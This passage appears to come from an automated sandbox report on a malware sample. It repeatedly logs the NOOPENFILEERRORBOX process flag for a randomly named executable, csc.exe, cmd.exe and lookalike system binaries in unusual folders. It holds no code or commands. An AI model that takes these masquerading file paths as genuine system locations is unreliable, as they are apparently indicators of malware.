                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\Default\SystemSettings.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess information set: NOOPENFILEERRORBOX
